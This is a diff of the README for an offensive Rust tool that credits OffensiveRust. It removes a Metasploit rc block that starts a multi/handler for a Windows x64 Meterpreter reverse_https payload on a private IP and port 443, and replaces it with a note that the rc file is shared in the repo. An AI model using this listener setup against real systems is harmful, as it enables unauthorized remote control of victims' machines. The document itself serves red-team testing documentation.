Nariod/Tartocitron/README.md

 https://www.rust-lang.org/tools/install

 ## Meterpreter rc file
-All tests presented here have been performed with the following msf rc entries:
+All tests presented here have been performed with a meterpreter shellcode + handler.
+The MSF rc file is shared in this repo.
-`use exploit/multi/handler
-set payload windows/x64/meterpreter/reverse_https
-set LHOST 192.168.56.101
-set LPORT 443
-set exitfunc thread
-set stagerencode true
-run -j`

 ## Credits
 * https://github.com/trickster0/OffensiveRust